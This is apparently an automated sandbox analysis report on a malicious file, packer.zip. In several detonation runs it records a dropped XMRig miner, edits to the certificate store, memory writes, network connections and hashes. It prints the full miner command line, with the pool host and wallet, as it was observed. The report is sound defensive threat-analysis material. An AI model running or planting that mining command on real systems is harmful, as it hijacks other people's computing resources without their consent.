Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Executes dropped EXE
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 14:33
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:15
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3136 wrote to memory of 5060 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3136 wrote to memory of 5060 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/5060-16-0x00000265D4B40000-0x00000265D4B60000-memory.dmp
memory/5060-17-0x00000265D4B90000-0x00000265D4BB0000-memory.dmp
memory/5060-18-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-20-0x00000265D6470000-0x00000265D6490000-memory.dmp
memory/5060-19-0x00000265D6490000-0x00000265D64B0000-memory.dmp
memory/5060-21-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-22-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-25-0x00000265D6470000-0x00000265D6490000-memory.dmp
memory/5060-24-0x00000265D6490000-0x00000265D64B0000-memory.dmp
memory/5060-23-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-26-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-27-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-28-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-29-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-30-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-31-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-32-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-33-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-34-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-35-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-36-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-37-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-38-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-39-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-40-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-41-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-42-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-43-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-44-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-45-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-46-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-47-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-48-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-49-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-50-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-51-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-52-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-53-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-54-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-55-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-56-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-57-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-58-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-59-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-60-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-61-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-62-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-63-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-64-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-65-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-66-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-67-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-68-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-69-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-70-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-71-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-72-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-73-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-74-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-75-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-76-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-77-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-78-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-79-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-80-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-81-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-82-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-83-0x00007FF770A60000-0x00007FF771563000-memory.dmp
memory/5060-84-0x00007FF770A60000-0x00007FF771563000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:17
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5028 wrote to memory of 3104 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5028 wrote to memory of 3104 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.201.86.20.in-addr.arpa | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3104-16-0x00000201D81E0000-0x00000201D8200000-memory.dmp
memory/3104-17-0x00000201D9C30000-0x00000201D9C50000-memory.dmp
memory/3104-18-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-20-0x00000201D9C70000-0x00000201D9C90000-memory.dmp
memory/3104-19-0x00000201D9C50000-0x00000201D9C70000-memory.dmp
memory/3104-21-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-22-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-25-0x00000201D9C70000-0x00000201D9C90000-memory.dmp
memory/3104-24-0x00000201D9C50000-0x00000201D9C70000-memory.dmp
memory/3104-23-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-26-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-27-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-28-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-29-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-30-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-31-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-32-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-33-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-34-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-35-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-36-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-37-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-38-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-39-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-40-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-41-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-42-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-43-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-44-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-45-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-46-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-47-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-48-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-49-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-50-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-51-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-52-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-53-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-54-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-55-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-56-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-57-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-58-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-59-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-60-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-61-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-62-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-63-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-64-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-65-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-66-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-67-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-68-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-69-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-70-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-71-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-72-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-73-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-74-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-75-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-76-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-77-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-78-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-79-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-80-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-81-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-82-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-83-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-84-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3336 wrote to memory of 4500 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3336 wrote to memory of 4500 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4500-16-0x0000029FF1E10000-0x0000029FF1E30000-memory.dmp
memory/4500-17-0x0000029FF2070000-0x0000029FF2090000-memory.dmp
memory/4500-18-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-20-0x000002A0861F0000-0x000002A086210000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240226-en
Max time kernel
1797s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
